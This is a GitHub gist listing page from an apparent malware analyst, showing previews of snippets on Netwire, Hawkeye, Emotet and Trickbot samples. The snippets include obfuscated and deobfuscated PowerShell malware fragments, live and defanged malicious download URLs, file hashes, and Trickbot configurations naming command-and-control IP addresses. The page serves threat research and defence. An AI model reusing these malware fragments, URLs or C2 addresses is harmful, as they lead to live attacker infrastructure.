Herbie Zimmerman bloomer1016

bloomer1016 / gist:8f7f8cd71c1da5c8ce19b5ea6c8c7e4c
Created May 28, 2020
2020-05-27 Netwire PoSH script deobfuscated
View gist:8f7f8cd71c1da5c8ce19b5ea6c8c7e4c
$scriptPath = split-path -parent $MyInvocation.MyCommand.Definition
function poaia (
$source,
$destination
)
{
Convert-StringToBinary -InputString $source -FilePath $Destination;
}
bloomer1016 / 2020-05-27-netwire-PoSH-script
Last active May 28, 2020
2020-05-27 Netwire PoSH script obfuscated
View 2020-05-27-netwire-PoSH-script
function DWCGZSSCOP([String] $DLFKTBYFDD, [String] $DQIMDWFDFC)
{
$ZPJZBWXZGI = "gXO0iD6V2ljQbtqtk61/mI3ZPQNygsdAqn5sMbtIyQWvSNJ++R/vdPhgWi0NT31Wf5w2cjsPbQ1uCJgW4gOp10tbsoCsqXJprJPY69Gn08rEFLSkIfF24pxM28/lXNvdYsJCqw1Te8FS9vcEPvg+rZU6btiwSAP6RGRv3dtxs2c0sIm5iV1KrdzGy0gGMy6fROFXzA5qZtxiJ+Plb8y0LLQv92OUEhgpY4WuoGL/AyQh34/Jo+FqltNu89OEx5NNS2QOjMiZp+Q9an6gIBeW5tbyj1QKXGf68mvR6U3crSZSjIp6rP5b5m669nPcLjkSIIo0s+niQm5dt9Y9RZAL1BIZ+8aONhTiL2X/QZkaJV3Ni+Bu5Hk2RaboaPKMUXxDarxHBHRGcIzQxdQEcCEEZQ7gtYbEvrxXc2Svp7yhtpfcFKmLHygPwcS9pcVCqwcPG0TafW8hLeMR4zJKTbSo2qfJ1CsQCzkbBPkqDxkZfITtN+Zw8aKg6v+9k1+9R5ADXy6hB6C0pbaWEOZCVieGZQpNjSZ7xk9wHYPEXwZMZWZxrSsiUmrHE0DvCvOk6pHEKsiMIX333DkJeWutu3SmmD83ewXsmyYaJDYpDtLuNUNm4Jze3YcIKU3T7eTgAkfqszBW744VIJwhKQqzAvW332RqG2JgLt/YJB8qgaD8X1z1m9DYOkCP9OMZgH3SHUNk09MpgaTBVzb2NpkSlSwScVsKzQCRf10rEbQyVcKco/yzmIVAVSK60LYRGHen8qdJrdbiK4E4DULiACuBTmkGyoiPPkB7AHJEPfLGJi2qPyj0lZ4NDGLrvuRQoI6L3NcIgTV6YVPNGysQT45Pyj28EVs3ZvVpLU/37SlrN1MkAvCaCK82tvvpg13tFCILouRB2JaYK+N4k4+dvo+jSR8gfwHYN58muntPUqUrcuoSY6LDzTq
View gist:abe4fc57310117da6703d49123f94757
http://lineward.net/?4xkey7=UAQDY1AKYKCVV1QHIANQIGG0CQi
http://runwithhunt.com/?6Fi7=i7(w5t8z.6].42170QIGYQYNCA3LUw
http://safiyaansari.com/?8o=mPUCmPTOCT0QIGYQYNCA3LUw
http://srt4dart.net/?56a8h=mABOJDAGUAQPTU0QIGYQYNCA3LUw
http://runwithhunt.com/?1WYEQ8=HQEGURNXQHIANQIGG0CQi
http://srt4dart.us/?22U=YCYCMDFOiH0QIGYQYNCA3LUw
http://charlesmessa.net/?6I01VO=CRUvFO0QIGYQYNCA3LUw
http://charlesmessa.net/?34S2d=QI/?TmPVV.45104160QIGYQYNCA3LUw
http://torktuned.com/?3AVOaV=QETtUy0DFOQzNYQHIANQIGG0CQi
http://regpharmconsult.com/?3pev13=APYBBOGWIRmAVYQHIANQIGG0CQi
View gist:476c6c6ab71f47d65e881c22f1dd62e4
Maldocs:
========
MD5 (F_P298298.doc) = e298770f693d152d37693eb855dde9e9
MD5 (F_T4545.doc) = 64e55a68e11af98e1ce319d0dd433de8
Artifacts:
MD5 (42.exe) = d0474a3558d7be310d72bf3146cb59d5 --> https://www.virustotal.com/#/file/48fedd8eb8fd95b1c3f3a43fe0ed4ff6e769902b1b7db1f07953455b5ff2c662/detection
MD5 (srvloada.exe) = d0474a3558d7be310d72bf3146cb59d5 --> https://www.virustotal.com/#/file/48fedd8eb8fd95b1c3f3a43fe0ed4ff6e769902b1b7db1f07953455b5ff2c662/detection
Malicious macro script:
bloomer1016 / gist:e205b0129c2367ff446ba6b2a6d77a60
Created Aug 24, 2018
2018-08-24: Hawkeye malspam process details
View gist:e205b0129c2367ff446ba6b2a6d77a60
Strings2 v1.3
Copyright © 2016, Geoff McDonald
http://www.split-code.com/
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
\??\C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
en-US
M/d/yyyy
bloomer1016 / gist:41badea3223a9e41b71d5720b0f618b5
Created Jul 10, 2018
2018-07-10 Emotet - Subject: Invoice related
View gist:41badea3223a9e41b71d5720b0f618b5
Valid URLs:
===========
hxxp://mjcapt[.]com/newsletter/US/ACCOUNT/Please-pull-invoice-44130/
hxxp://www[.]anadolu-yapi[.]xyz/pdf/US/Order/Order-22324681075/
hxxp://www[.]friendsengg[.]co[.]in/files/En_us/STATUS/Invoice-07-10-18/
hxxp://www[.]desabiangkeke[.]com/doc/EN_en/INVOICE-STATUS/Invoice-18660/
hxxp://www[.]nasa[.]ekpaideusi[.]gr/newsletter/US/DOC/Invoice-3243324682-07-10-2018/
hxxp://www[.]elizimuhendislik[.]xyz/doc/EN_en/Statement/Invoice-7384991949-07-10-2018/
hxxp://www[.]docudabra[.]com/newsletter/En/ACCOUNT/Pay-Invoice/
hxxp://test[.]foskinterior[.]com/Jul2018/En_us/ACCOUNT/Invoice-14693880736-07-09-2018/
View gist:e7873b265b241459e219f7dc83c2e8d3
MD5 of "invoice_<random number string>.doc": 916F1A229B73D5720AA51E596BE52EE5
Count of unique URLs in all the sample of emails:
-------------------------------------------------
8 dudz.biz
7 golfdudz.biz
5 golfdudz.com
4 johnstontrav.com
5 kickasstrophe.org
3 mmmfrecklespbctw.com
View gist:4f9e402c407c4526ab69559308139061
Any.Run:
========
https://app.any.run/tasks/e3551e19-4898-4dc7-b646-cf50c50e1fac
https://app.any.run/tasks/cb544ffd-5c07-4470-a618-33117882059f
VT:
===
https://www.virustotal.com/#/file/91d0f65b0e9f62ccb7817030967cde51c8f4806a8acec6deabec39c7d8adb416/community
https://www.virustotal.com/#/file/ece2a89aa4bdb318370bc75458d7d790791d7b46287888d40b555e3b7726b228/community
bloomer1016 / gist:2d2e1b676c95c916bff6ecadbe5510af
Created Jun 5, 2018
2018-06-05 Trickbot Config (ver 1000206 / gtag ser0605)
View gist:2d2e1b676c95c916bff6ecadbe5510af
<mcconf>
<ver>1000206</ver>
<gtag>ser0605</gtag>
<servs>
<srv>93.109.242.134:443</srv>
<srv>46.47.50.44:443</srv>
<srv>190.7.199.42:443</srv>
<srv>158.58.131.54:443</srv>
View gist:a628315d67865ab95b4b52bc36b5798e
2017-12-06
==========
<mcconf>
<ver>1000098</ver>
<gtag>ser0512</gtag>
<servs>
<srv>79.106.41.9:449</srv>
<srv>94.250.252.146:443</srv>
<srv>62.109.18.206:443</srv>
<srv>62.109.26.193:443</srv>